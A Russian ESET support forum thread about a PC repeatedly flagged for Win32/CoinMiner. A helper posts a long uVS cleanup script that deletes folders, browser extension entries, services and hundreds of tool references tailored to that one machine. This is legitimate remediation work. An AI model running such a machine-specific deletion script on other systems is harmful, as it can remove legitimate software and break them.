NOD32 постоянно ловит Win32/CoinMiner - Форум технической поддержки ESET NOD32

Сообщений: 12

Баллов: 6

Регистрация: 21.04.2015

Размещено 16.01.2018 21:28:41

Здравствуйте!
Замучил CoinMiner , прошу помощи.
образ автозагрузки прилагаю

Сообщений: 17962

Баллов: 14369

Регистрация: 16.03.2010

Размещено 17.01.2018 01:56:51

Евгений,

1. добавьте лог журнала обнаружения угроз
http://forum.esetnod32.ru/forum9/topic1408/

2. выполните скрипт по очистке системы.

выполняем скрипт в uVS:
- скопировать содержимое кода в буфер обмена;
- стартуем uVS(start.exe), далее выбираем: текущий пользователь, меню - скрипты - выполнить скрипт из буфера обмена;
- закрываем все браузеры перед выполнением скрипта;
при деинсталляции программ - соглашаемся на деинсталляцию_удаление подтверждаем "да"

Код
------------ ;uVS v4.0.10 [http://dsrt.dyndns.org] ;Target OS: NTv6.1 v400c OFFSGNSAVE ;------------------------autoscript--------------------------- deldirex %SystemDrive%\USERS\APTEM\APPDATA\LOCALLOW\UNITY\WEBPLAYER\LOADER deldirex %SystemDrive%\USERS\АДМИНИСТРАТОР\APPDATA\LOCALLOW\UNITY\WEBPLAYER\LOADER delref HTTPS://CLIENTS2.GOOGLE.COM/SERVICE/UPDATE2/CRX?RESPONSE=REDIRECT&PRODVERSION=38.0&X=ID%3DEFAIDNBMNNNIBPCAJPCGLCLEFINDMKAJ%26INSTALLSOURCE%3DONDEMAND%26UC delref HTTPS://CLIENTS2.GOOGLE.COM/SERVICE/UPDATE2/CRX?RESPONSE=REDIRECT&PRODVERSION=38.0&X=ID%3DLIFBCIBLLHKDHOAFPJFNLHFPFGNPLDFL%26INSTALLSOURCE%3DONDEMAND%26UC delref HTTPS://CLIENTS2.GOOGLE.COM/SERVICE/UPDATE2/CRX?RESPONSE=REDIRECT&PRODVERSION=38.0&X=ID%3DODIJCGAFKHPOBJLNFDGIACPDENPMBGME%26INSTALLSOURCE%3DONDEMAND%26UC delref HTTPS://CLIENTS2.GOOGLE.COM/SERVICE/UPDATE2/CRX?RESPONSE=REDIRECT&PRODVERSION=38.0&X=ID%3DPHKDCINMMLJBLPNKOHLIPAIODLONPINF%26INSTALLSOURCE%3DONDEMAND%26UC delref HTTPS://CLIENTS2.GOOGLE.COM/SERVICE/UPDATE2/CRX?RESPONSE=REDIRECT&PRODVERSION=38.0&X=ID%3DPMPOAAHLECCAIBBHFJFIMIGEPMFMMBBK%26INSTALLSOURCE%3DONDEMAND%26UC delref %SystemDrive%\USERS\APTEM\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\EXTENSIONS\PHKDCINMMLJBLPNKOHLIPAIODLONPINF\11.0.3_0\ПОИСК MAIL.RU delref %SystemDrive%\USERS\АДМИНИСТРАТОР\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\EXTENSIONS\PHKDCINMMLJBLPNKOHLIPAIODLONPINF\11.0.1_0\ПОИСК MAIL.RU delref HTTPS://CLIENTS2.GOOGLE.COM/SERVICE/UPDATE2/CRX?RESPONSE=REDIRECT&PRODVERSION=38.0&X=ID%3DFCFENMBOOJPJINHPGGGODEFCCIPIKBPD%26INSTALLSOURCE%3DONDEMAND%26UC delref %SystemDrive%\USERS\UPDATUSUSER\APPDATA\ROAMING\MICROSOFT\INTERNET EXPLORER\QUICK LAUNCH\USER PINNED\TASKBAR\INTERNET EXPLORER (2).LNK delref %SystemDrive%\USERS\UPDATUSUSER\APPDATA\ROAMING\MICROSOFT\INTERNET EXPLORER\QUICK LAUNCH\USER PINNED\TASKBAR\INTERNET EXPLORER.LNK apply deltmp delref {23E5D772-327A-42F5-BDEE-C65C6796BB2A}\[CLSID] delref {177AFECE-9599-46CF-90D7-68EC9EEB27B4}\[CLSID] delref {CEF51277-5358-477B-858C-4E14F0C80BF7}\[CLSID] delref {59116E30-02BD-4B84-BA1E-5D77E809B1A2}\[CLSID] delref %SystemDrive%\PROGRAM FILES\RECUVA\RECUVA.EXE delref %Sys32%\BLANK.HTM delref %Sys32%\DRIVERS\RDVGKMD.SYS delref {0D012ABD-CEED-11D2-9C76-00105AA73033}\[CLSID] delref %SystemDrive%\USERS\APTEM\APPDATA\LOCALLOW\UNITY\WEBPLAYER\LOADER\UNITYWEBPLUGINAX.OCX delref {56A58823-AE99-11D5-B90B-0050DACD1F75}\[CLSID] delref {CFCDAA03-8BE4-11CF-B84B-0020AFBBCCFA}\[CLSID] delref {E01D1C6A-4F40-11D3-8958-00105A272DCF}\[CLSID] delref %Sys32%\MSSPELLCHECKINGFACILITY.DLL delref %SystemDrive%\USERS\АДМИНИСТРАТОР\APPDATA\LOCAL\TEMP\NKCPOPGGJCJKIICPENIKEOGIOEDNJEAC.CRX delref %SystemDrive%\USERS\АДМИНИСТРАТОР\APPDATA\LOCAL\BEELINE NETWORK MANAGER\UPDATER\CHP.EXE delref %SystemRoot%\USB VIBRATION\7906\USB GAMEPAD.EXE -BOOT delref {1FBA04EE-3024-11D2-8F1F-0000F87ABD16}\[CLSID] delref {E0DD6CAB-2D10-11D2-8F1A-0000F87ABD16}\[CLSID] delref {E6FB5E20-DE35-11CF-9C87-00AA005127ED}\[CLSID] delref HELPSVC\[SERVICE] delref SACSVR\[SERVICE] delref VMMS\[SERVICE] delref MESSENGER\[SERVICE] delref RDSESSMGR\[SERVICE] delref %SystemDrive%\PROGRAMDATA\APEXSQL\APEXSQLLOG\(LOCAL)\BINN\APEXSQLLOGSERVERHELPER.SYS delref %Sys32%\DRIVERS\H647906.SYS delref %Sys32%\DRIVERS\VBOXNETFLT.SYS delref %Sys32%\PSXSS.EXE delref %SystemDrive%\PROGRAM FILES\JAVA\JRE1.8.0_77\BIN\JP2IEXP.DLL delref %SystemDrive%\PROGRAM FILES\MICROSOFT OFFICE\OFFICE12\OUTLCTL.DLL delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.26.9\PSMACHINE.DLL delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.28.1\PSMACHINE.DLL delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.33.3\PSMACHINE.DLL delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.21.145\PSMACHINE.DLL delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.32.7\PSMACHINE.DLL delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.22.5\PSMACHINE.DLL delref %Sys32%\MSFLXGRD.OCX delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.21.111\PSMACHINE.DLL delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.21.165\PSMACHINE.DLL delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.27.5\PSMACHINE.DLL delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.28.15\PSMACHINE.DLL delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.29.1\PSMACHINE.DLL delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.30.3\PSMACHINE.DLL delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.33.5\PSMACHINE.DLL delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.21.153\PSMACHINE.DLL delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.25.11\PSMACHINE.DLL delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.21.135\PSMACHINE.DLL delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.23.9\PSMACHINE.DLL delref %SystemDrive%\PROGRAM FILES\ADOBE\ACROBAT READER DC\ACRORD32INFO.EXE delref %SystemDrive%\PROGRAM FILES\EMBARCADERO\STUDIO\15.0\BIN\MIDAS.DLL delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.24.7\PSMACHINE.DLL delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.25.5\PSMACHINE.DLL delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.28.13\PSMACHINE.DLL delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.21.124\PSMACHINE.DLL delref %Sys32%\SHAREMEDIACPL.CPL delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.31.5\PSMACHINE.DLL delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.21.99\PSMACHINE.DLL delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.29.5\PSMACHINE.DLL delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.22.3\PSMACHINE.DLL delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.24.15\PSMACHINE.DLL delref %SystemDrive%\PROGRA~1\EMBARC~1\STUDIO\18.0\BIN\GETITH~1.DLL delref G:\SETUP.EXE delref {AE805869-2E5C-4ED4-8F7B-F1F7851A4497}\[CLSID] delref L:\INSTALL_RADSTUDIO.EXE delref M:\HTC_SYNC_MANAGER_PC.EXE delref F:\AUTORUN.EXE delref L:\AUTORUN.EXE delref G:\INSTALL_RADSTUDIO.EXE delref %SystemDrive%\PROGRAM FILES\GRAND THEFT AUTO IV\ROCKSTAR GAMES SOCIAL CLUB\RGSCLAUNCHER.EXE delref {ADACAA8F-3595-47FE-9C31-9C7471B9BEC7}\[CLSID] delref D:\PROGRAM FILES\INTERNET EXPLORER\IEXPLORE.EXE delref %SystemDrive%\PROGRAM FILES\EMBARCADERO\STUDIO\18.0\BIN\BDS.EXE delref %SystemDrive%\PROGRAM FILES\FALCO.URL delref %SystemDrive%\PROGRAM FILES\FREEGAMIA.URL delref %SystemDrive%\USERS\АДМИНИСТРАТОР\APPDATA\LOCAL\KRYPTEX\KRYPTEX.EXE delref %SystemDrive%\PROGRAM FILES\MAKEMKV\MAKEMKV.URL delref Y:\MEDIA\AIMP\AIMP2.EXE delref Y:\HDD-UTILITES\CHECKDISK.EXE delref Y:\HDD-UTILITES\CHKDSKGUI.EXE delref Y:\MEDIA\POTPLAYER\POTPLAYER.EXE delref %SystemDrive%\USERS\836D~1\APPDATA\LOCAL\TEMP\2K10\FAR\FAR.EXE delref Y:\UTILITES\NIRLAUNCHER\NIRLAUNCHER.EXE delref Y:\MEDIA\MPC-BE\MPC-BE.EXE delref %SystemDrive%\USERS\836D~1\APPDATA\LOCAL\TEMP\2K10\TERACOPY\TERACOPY.EXE delref %SystemDrive%\USERS\836D~1\APPDATA\LOCAL\TEMP\2K10\TOTALCMD\TOTALCMD.EXE delref Y:\CD-UTILITES\AMOK_BURNING\AMOK_DVD_BURNER.EXE delref Y:\CD-UTILITES\CDROLLER\CDROLLER.EXE delref Y:\CD-UTILITES\CDCHECK\CDCHECK.EXE delref Y:\CD-UTILITES\CDSHOT\CDSHOT.EXE delref Y:\CD-UTILITES\GBURNER\GBURNER.EXE delref Y:\CD-UTILITES\IMGBURN\IMGBURN.EXE delref Y:\CD-UTILITES\ISOBUSTER\ISOBUSTER.EXE delref Y:\CD-UTILITES\MOBALIVE\MOBALIVE.EXE delref Y:\CD-UTILITES\NERO\NERO.EXE delref Y:\CD-UTILITES\OPTIDRIVECONTROL\OPTIDRIVECONTROL.EXE delref Y:\CD-UTILITES\OSF-MOUNT\OSFMOUNT.EXE delref Y:\CD-UTILITES\QEMUBOOTTESTER\QEMUBOOTTESTER.EXE delref Y:\CD-UTILITES\SFILECOPIER\SFC.EXE delref Y:\CD-UTILITES\ULTRAISO\ULTRAISO.EXE delref Y:\CD-UTILITES\UNSTOPPABLECOPIER\UNSTOPCP.EXE delref Y:\CD-UTILITES\WINIMAGE\WINIMAGE.EXE delref Y:\CD-UTILITES\WINMOUNT\WINMOUNT.EXE delref Y:\FLASH-UTILITES\ATTO-DISKBENCHMARK\BENCH32.EXE delref Y:\SYSTEM\WINNTSETUP\BOOTICE.EXE delref Y:\FLASH-UTILITES\BOOTICE\BOOTICE.EXE delref Y:\FLASH-UTILITES\CHECKFLASH\CHECKFLASH.EXE delref Y:\FLASH-UTILITES\CHECKUDISK\CHECKUDISK.EXE delref Y:\FLASH-UTILITES\CHIPEASY\CHIPEASY.EXE delref Y:\FLASH-UTILITES\FBINSTTOOL\FBINSTTOOL.EXE delref Y:\FLASH-UTILITES\FBINST-FF\FLASHFORMAT_2K10_FBINST.EXE delref Y:\FLASH-UTILITES\RMPREP-FF\FLASHFORMAT_2K10_RMPREP.EXE delref Y:\FLASH-UTILITES\FM-TOOLKIT\FLASHMEMORYTOOLKIT.EXE delref Y:\FLASH-UTILITES\FLASHNUL\FLASHNUL.EXE delref Y:\FLASH-UTILITES\GETFLASHINFO\GETFLASHINFO.EXE delref Y:\FLASH-UTILITES\GRUB4DOS\GRUBINST_GUI.EXE delref Y:\FLASH-UTILITES\HPUSBFW\HPUSBFW.EXE delref Y:\FLASH-UTILITES\IMAGEUSB\IMAGEUSB.EXE delref Y:\FLASH-UTILITES\SDFORMATTER\SDFORMATTER.EXE delref Y:\FLASH-UTILITES\MYDISKTEST\MYDISKTEST.EXE delref Y:\FLASH-UTILITES\NTFS-DP\NTFS-DRIVEPROTECTION.EXE delref Y:\FLASH-UTILITES\RMPREPUSB\RMPREPUSB.EXE delref Y:\FLASH-UTILITES\RUFUS\RUFUS.EXE delref Y:\FLASH-UTILITES\USB-SAFELYREMOVE\USB-SAFELYREMOVE.EXE delref Y:\FLASH-UTILITES\USBDEVIEW\USBDEVIEW.EXE delref Y:\FLASH-UTILITES\USBIDCHECK\USBIDCHECK.EXE delref Y:\FLASH-UTILITES\WINCONTIG\WINCONTIG.EXE delref Y:\FLASH-UTILITES\H2TEST\H2TESTW.EXE delref Y:\RECOVERY\ACTIVE@UTILITES\HDHEX-EDITOR.EXE delref Y:\RECOVERY\ACTIVE@UTILITES\KILLDISK.EXE delref Y:\RECOVERY\ACTIVE@UTILITES\PARTMAN.EXE delref Y:\HDD-UTILITES\AOMEI_PA\P_ASSISTANT.EXE delref Y:\HDD-UTILITES\DDMANAGER\DDMANAGER.EXE delref Y:\HDD-UTILITES\DLG-DIAGNOSTICS\DLG-DIAGNOSTICS.EXE delref Y:\HDD-UTILITES\DCHANGER\DCHANGER.EXE delref Y:\HDD-UTILITES\DEFRAGGLER\DEFRAGGLER.EXE delref Y:\HDD-UTILITES\DFSEE\DFSEE.EXE delref Y:\HDD-UTILITES\DMDE\DMDE.EXE delref Y:\HDD-UTILITES\DISKSMARTVIEW\DISKSMARTVIEW.EXE delref Y:\RECOVERY\TESTDISK\TESTDISK.EXE delref Y:\HDD-UTILITES\DRIVEMAN\DRIVEMAN.EXE delref Y:\HDD-UTILITES\EASEUS-PM\EASEUS-PM.EXE delref Y:\HDD-UTILITES\HDSENTINEL\HDSENTINEL.EXE delref Y:\HDD-UTILITES\LLF-TOOL\LLFTOOL.EXE delref Y:\HDD-UTILITES\HDD-SCAN\HDDSCAN.EXE delref Y:\HDD-UTILITES\HDHACKER\HDHACKER.EXE delref Y:\HDD-UTILITES\HDTUNEPRO\HDTUNEPRO.EXE delref Y:\HDD-UTILITES\MYDEFRAG\MYDEFRAG4.EXE delref Y:\HDD-UTILITES\PARAGON-HDM\PARAGON-AT.EXE delref Y:\HDD-UTILITES\PARAGON-HDM\PARAGON-HDM.EXE delref Y:\HDD-UTILITES\PARAGON-HDMP\PHDM15P.EXE delref Y:\HDD-UTILITES\PARTITIONGURU\PARTITIONGURU.EXE delref Y:\HDD-UTILITES\PARTITIONWIZARD\PARTITIONWIZARD.EXE delref Y:\HDD-UTILITES\SMARTVISION\SMARTVISION.EXE delref Y:\HDD-UTILITES\ULTIMATEDEFRAG\UDEFRAG.EXE delref Y:\HDD-UTILITES\ULTRADEFRAG\ULTRADEFRAG.EXE delref Y:\HDD-UTILITES\VICTORIA\VICTORIA.EXE delref Y:\HDD-UTILITES\VOPT\VOPT.EXE delref Y:\HDD-UTILITES\AUSLOGICS\DISKDEFRAG.EXE delref Y:\ANTIVIR\ADWCLEANER\ADWCLEANER.EXE delref Y:\ANTIVIR\ANTIDUST\ANTIDUST.EXE delref Y:\ANTIVIR\ANTISMS\ANTISMS3.EXE delref Y:\ANTIVIR\ANTISMS\ANTISMS.EXE delref Y:\ANTIVIR\AVZ\START.EXE delref Y:\ANTIVIR\ANTIWINLOCKER\ANTIWINLOCKER.EXE delref Y:\ANTIVIR\ANVIR\ANVIR.EXE delref Y:\ANTIVIR\DRCUREIT\DRCUREIT-HDD.CMD delref Y:\ANTIVIR\DRCUREIT\UPDATE.CMD delref Y:\ANTIVIR\DRCUREIT\DRCUREIT.CMD delref Y:\ANTIVIR\HIJACKTHIS\HIJACKTHIS.EXE delref Y:\ANTIVIR\KASPERSKYVRT\KASPERVRT.CMD delref Y:\ANTIVIR\KASPERSKYVRT\KASPERVRT-HDD.CMD delref Y:\ANTIVIR\KASPERSKYVRT\UPDATE.CMD delref %Sys32%\RUNSCANNER.CMD delref Y:\ANTIVIR\BHOREMOVER\BHOREMOVER.EXE delref Y:\ANTIVIR\UVS\UVS.EXE delref %SystemDrive%\USERS\836D~1\APPDATA\LOCAL\TEMP\2K10\7-ZIP\7ZFM.EXE delref Y:\ARHIVERS\7-ZIP\7-ZIP.EXE delref %SystemDrive%\USERS\836D~1\APPDATA\LOCAL\TEMP\7-ZIP\7ZFM.EXE delref Y:\ARHIVERS\78REPACK\78REPACK.EXE delref Y:\ARHIVERS\7ZSFX-BUILDER\7ZSFX-BUILDER.EXE delref Y:\ARHIVERS\7ZSPLIT\7ZSPLIT.EXE delref Y:\ARHIVERS\ARID\ARIDG.EXE delref Y:\ARHIVERS\EASYUHA\EASYUHA.EXE delref Y:\ARHIVERS\SPLITTER\SPLITTER.EXE delref Y:\ARHIVERS\MOLESVPC\MOLESVPC.EXE delref Y:\ARHIVERS\PE-COMPACT\PE-COMPACT.EXE delref Y:\ARHIVERS\TROLOPATCH\TROLOPATCH.EXE delref Y:\ARHIVERS\UNIEXTRACT\UNIEXTRACT.EXE delref Y:\ARHIVERS\UPX-X-SHELL\UPXXSHELL.EXE delref Y:\ARHIVERS\WINRAR\WINRAR.EXE delref Y:\ARHIVERS\WINUHA\WINUHA.EXE delref Y:\RECOVERY\ACTIVE@UTILITES\FILERECOVERY.EXE delref Y:\RECOVERY\ACTIVE@UTILITES\UNDELETE.EXE delref Y:\RECOVERY\ACTIVE@UTILITES\UNERASER.EXE delref Y:\RECOVERY\CHKREPAIR\CHKREPAIR.EXE delref Y:\RECOVERY\EASEUS-DRW\EASEUS-DRW.EXE delref Y:\RECOVERY\EASYRECOVERY\EASYRECOVERY.EXE delref Y:\RECOVERY\UFS-EXPLORER\UFS-EXPLORER.EXE delref Y:\RECOVERY\GETDATABACK\GETDATABACK.EXE delref Y:\RECOVERY\R.SAVER\R.SAVER.EXE delref Y:\RECOVERY\RECOVERMF\RECOVERMYFILES.EXE delref Y:\RECOVERY\RECUVA\RECUVA.EXE delref Y:\RECOVERY\ZAR\ZAR.EXE delref Y:\BOOTRECOVERY\BCDTOOL\BCDTOOL.EXE delref Y:\BOOTRECOVERY\BELLAVISTA\BELLAVISTA.EXE delref Y:\BOOTRECOVERY\BOOTBUILDER\BOOTBUILDER.EXE delref Y:\BOOTRECOVERY\BOOTSECTGUI\BOOTSECTGUI.EXE delref Y:\BOOTRECOVERY\FIXBOOTFULL\FIXBOOTFULL.EXE delref Y:\BOOTRECOVERY\MBRCHECK\MBRCHECK.EXE delref Y:\BOOTRECOVERY\MULTIBOOT\MULTIBOOT.EXE delref Y:\BOOTRECOVERY\MBRFIX\UMBRGUI.EXE delref Y:\RECOVERY\ACTIVE@UTILITES\UNFORMAT.EXE delref Y:\RECOVERY\CAPTAINNEMO\NEMO.EXE delref Y:\RECOVERY\DISKEXPLORER\DEXPLORER-NTFS.EXE delref Y:\RECOVERY\EASSOS-RECOVERY\E_RECOVERY.EXE delref Y:\RECOVERY\EXT2MGR\EXT2MGR.EXE delref Y:\RECOVERY\HDD-RAWCOPY\RAWCOPY.EXE delref Y:\RECOVERY\O&O-DISKRECOVERY\O&O-DISKRECOVERY.EXE delref Y:\RECOVERY\FINDANDMOUNT\FINDANDMOUNT.EXE delref Y:\RECOVERY\PTDD\PTDWIN.EXE delref Y:\RECOVERY\RAID-RECONSTRUCTOR\RAIDRECONSTRUCTOR.EXE delref Y:\RECOVERY\TRANSMAC\TRANSMAC.EXE delref Y:\RECOVERY\ACTIVE@UTILITES\DISKIMAGE.EXE delref Y:\RECOVERY\A_BACKUPPER\A_BACKUPPER.EXE delref Y:\RECOVERY\DRIVECLONERRX\DRIVECLONERRX.EXE delref Y:\RECOVERY\DRIVESNAPSHOT\SNAPSHOT.EXE delref Y:\RECOVERY\EASSOS-SR\E_SYSTEMRESTORE.EXE delref Y:\RECOVERY\FAB'SAUTOBACKUP\AUTOBACKUP.EXE delref Y:\RECOVERY\GIMAGEX\GIMAGEX.EXE delref Y:\RECOVERY\HDCLONE\HDCLONE.EXE delref Y:\RECOVERY\R-DRIVE\R-DRIVEIMAGE.EXE delref Y:\RECOVERY\REFLECTPE\REFLECTPE.EXE delref Y:\RECOVERY\DRIVEIMAGE-XML\DRIVEIMAGE-XML.EXE delref Y:\RECOVERY\SHADOWPROTECT\SHADOWPROTECTPE.EXE delref Y:\RECOVERY\SKYIAR\SKYIAR.EXE delref Y:\RECOVERY\GHOST\GHOST32.EXE delref Y:\RECOVERY\TERABYTEIMAGE\TERABYTEIMAGE.EXE delref Y:\GRAPHICS\ACDSEE\ACDSEE32.EXE delref Y:\GRAPHICS\ARTICONS\ARTICONS.EXE delref Y:\GRAPHICS\CAPTURETEXT\CAPTURETEXT.EXE delref Y:\GRAPHICS\FSCAPTURE\FSCAPTURE.EXE delref Y:\GRAPHICS\FSVIEWER\FSVIEWER.EXE delref Y:\GRAPHICS\IMAGEUPLOADER\IMAGEUPLOADER.EXE delref Y:\GRAPHICS\IRFANVIEW\I_VIEW32.EXE delref Y:\GRAPHICS\KCHMVIEWER\KCHMVIEWER.EXE delref Y:\GRAPHICS\SUMATRA-PDF\SUMATRAPDF.EXE delref Y:\GRAPHICS\PDFXCVIEW\PDFXCVIEW.EXE delref Y:\GRAPHICS\PHOTOFILTRE\PHOTOFILTRE.EXE delref Y:\GRAPHICS\PICPICK\PICPICK.EXE delref Y:\GRAPHICS\STDU-VIEWER\STDUVIEWERAPP.EXE delref Y:\GRAPHICS\SYSEXP\SYSEXP.EXE delref Y:\GRAPHICS\GIFANIMATOR\GIFANIMATOR.EXE delref Y:\GRAPHICS\WINDJVIEW\WINDJVIEW.EXE delref %SystemDrive%\USERS\836D~1\APPDATA\LOCAL\TEMP\XNVIEW\XNVIEW.EXE delref Y:\DRIVERS\CHECKDEVICE\CHECKDEVICE.EXE delref Y:\DRIVERS\DEVMANVIEW\DEVMANVIEW.EXE delref Y:\DRIVERS\DOUBLEDRIVER\DOUBLEDRIVER.EXE delref Y:\DRIVERS\DRIVEXP\DRIVEXP.EXE delref Y:\DRIVERS\DRIVERINJECTION\DRIVERINJECTION.EXE delref Y:\DRIVERS\DRIVERSWEEPER\DRIVERSWEEPER.EXE delref Y:\DRIVERS\DRIVERVIEW\DRIVERVIEW.EXE delref Y:\DRIVERS\GETPEDRIVER\GETPEDRIVER.EXE delref Y:\DRIVERS\INFTOREG\INFTOREG.EXE delref Y:\DRIVERS\MONITORINFOVIEW\MONITORINFOVIEW.EXE delref Y:\DRIVERS\UNKNOWNDI\UNKNOWNDI.EXE delref Y:\DRIVERS\UNKNOWNDEVICES\UNKNOWNDEVICES.EXE delref Y:\DRIVERS\HWID\HWID.EXE delref Y:\FILEMANAGER\Q-DIR\Q-DIR.EXE delref Y:\FILEMANAGER\TERACOPY\TERACOPY.EXE delref Y:\FILEMANAGER\XPLORER2\XPLORER2.EXE delref Y:\INTERNET\ADMUNCHER\ADMUNCHER.EXE delref Y:\UTILITES\EVERYTHING\EVERYTHING.EXE delref Y:\NETWORK\NETSETMAN\NETSETMAN.EXE delref Y:\INTERNET\OPERA\OPERA.EXE delref Y:\INTERNET\QTWEB\QTWEB.EXE delref Y:\REMOTE\RADMINC\RADMIN.EXE delref Y:\INTERNET\SKYPE\START.EXE delref Y:\FILEMANAGER\TOTALCMD\TC.EXE delref Y:\EDITORS\ADITOR\ADITOR.EXE delref Y:\EDITORS\AKELPAD\AKELPAD.EXE delref Y:\EDITORS\ATLANTIS\ATLANTIS.EXE delref Y:\EDITORS\DBFPLUS\DBFPLUS.EXE delref Y:\EDITORS\CDBFW\CDBFW.EXE delref Y:\EDITORS\FLEXHEX\FLEXHEX.EXE delref Y:\EDITORS\HEXPROBE\HEXPROBE.EXE delref Y:\EDITORS\HXD\HXD.EXE delref Y:\EDITORS\NOTEPAD2\NOTEPAD2.EXE delref Y:\EDITORS\NOTEPAD++\NOTEPAD++.EXE delref Y:\EDITORS\SMOFFICE2012\PLANMAKER.EXE delref Y:\EDITORS\SPREAD\SPREAD32.EXE delref Y:\EDITORS\SMOFFICE2012\TEXTMAKER.EXE delref Y:\EDITORS\UEDIT\UEDIT.EXE delref Y:\EDITORS\WINHEX\WINHEX.EXE delref Y:\EDITORS\TCODE\TCODE.EXE delref Y:\REGISTRY\REGTRACERA\ART.EXE delref %Sys32%\RUNSCANNER.EXE delref Y:\REGISTRY\FW-REGREPAIR\FW-REGREPAIR.EXE delref Y:\REGISTRY\INF2REG\SHADRACH-INF2REG2HIV.EXE delref Y:\REGISTRY\REGSCANNER\JUMPREG.EXE delref Y:\REGISTRY\REGORGANIZER\REGORGANIZER.EXE delref Y:\REGISTRY\REG2WBS\REG2WBS.EXE delref Y:\REGISTRY\REGALYZER\REGALYZER.EXE delref Y:\REGISTRY\REGCONVERTPE\REGCPE.EXE delref Y:\REGISTRY\REGEDITPE\REGEDITPE.EXE delref %Sys32%\HIDCON.EXE delref Y:\REGISTRY\REGFROMAPP\REGFROMAPP.EXE delref Y:\REGISTRY\R-REGISTRYMANAGER\R-REGISTRYMANAGER.EXE delref Y:\REGISTRY\REGISTRYRESTORE\REGRESWIZ.EXE delref Y:\REGISTRY\REGSHOTUNI\REGSHOT.EXE delref Y:\REGISTRY\REGSHOT\REGSHOT.EXE delref Y:\REGISTRY\REGTOSCRIPT\REGTOSCRIPT.EXE delref Y:\REGISTRY\REGWORKS\REGWORKS.EXE delref Y:\REGISTRY\REGWORKSHOP\REGWORKSHOP.EXE delref Y:\REGISTRY\REHIVE\REHIVE.EXE delref Y:\REGISTRY\SYSTRACER\SYSTRACER.EXE delref Y:\REGISTRY\W-REGISTRYCLEANER\W-REGISTRYCLEANER.EXE delref Y:\INTERNET\HTTPFS\HTTPFS.EXE delref Y:\INTERNET\ISENDSMS\ISENDSMS.EXE delref Y:\INTERNET\RNQ\RNQ.EXE delref Y:\INTERNET\UTORRENT\UTORRENT.EXE delref Y:\INTERNET\VIRUSTOTALUPLOAD\VT-UPLOADER.EXE delref Y:\INTERNET\OPERA\OPERA.CMD delref Y:\INTERNET\QTWEB\QTWEB.CMD delref Y:\REMOTE\AEROADMIN\AEROADMIN.EXE delref Y:\REMOTE\AMMYY\AMMYY.EXE delref Y:\REMOTE\MSTSC\MSTSC.EXE delref Y:\REMOTE\TEAMVIEWER\TEAM_VIEWER.EXE delref Y:\REMOTE\TEAMVIEWER9\TEAMVIEWER9.EXE delref Y:\REMOTE\TIGHTVNC\TVNSERVER.EXE delref Y:\REMOTE\TIGHTVNC\TVNVIEWER.EXE delref Y:\REMOTE\VNCVIEWER\VNCVIEWER.EXE delref Y:\NETWORK\IP-ADDRESSCALCULATOR\IP-ADDRESSCALCULATOR.EXE delref Y:\NETWORK\PORTSCANNER\PORTSCANNER.EXE delref Y:\NETWORK\ETOOLZ\ETOOLZ.EXE delref Y:\NETWORK\HOVERIP\HOVERIP.EXE delref Y:\NETWORK\INETOPS\INETOPS.EXE delref Y:\NETWORK\LANCALCULATOR\LANCALCULATOR.EXE delref Y:\NETWORK\LAN-SCANNER\LAN-SCANNER.EXE delref Y:\NETWORK\MYLANVIEWER\MYLANVIEWER.EXE delref Y:\NETWORK\NETSHAREMONITOR\NETSHAREMONITOR.EXE delref Y:\NETWORK\PUTTY\PUTTY.EXE delref Y:\NETWORK\TCPVIEW\TCPVIEW.EXE delref Y:\NETWORK\WIRELESSNETVIEW\WIRELESSNETVIEW.EXE delref Y:\SYSTEM\BLUESCREENVIEW\BLUESCREENVIEW.EXE delref Y:\SYSTEM\CURRENTPROCESS\CPROCESS.EXE delref Y:\SYSTEM\DEPENDS\DEPENDS.EXE delref Y:\SYSTEM\ERD-2005\EXPLORER.EXE delref Y:\SYSTEM\ERRORLOOKUP\ERRORLOOKUP.EXE delref Y:\SYSTEM\HASHTAB\HASHTAB32_S.EXE delref Y:\SYSTEM\JV16-POWERTOOLS\JV16-POWERTOOLS.EXE delref Y:\SYSTEM\LOCKHUNTER\LOCKHUNTER.EXE delref Y:\SYSTEM\MYUNINSTALLER\MYUNINST.EXE delref Y:\SYSTEM\NTFSACCESS\NTFSACCESS.EXE delref Y:\SYSTEM\OPENEDFILESVIEW\OPENEDFILESVIEW.EXE delref Y:\SYSTEM\PROCESSACTIVITYVIEW\PROCESSACTIVITYVIEW.EXE delref Y:\SYSTEM\PROCESSEXPLORER\PROCESSEXPLORER.EXE delref Y:\SYSTEM\PROCESSHACKER\PROCESSHACKER.EXE delref Y:\SYSTEM\PSERVICES\PSERV2.EXE delref Y:\SYSTEM\YANDEXPUNTO\PUNTO.EXE delref Y:\DRIVERS\SERVIWIN\SERVIWIN.EXE delref Y:\SYSTEM\SHELLEXVIEW\SHEXVIEW.EXE 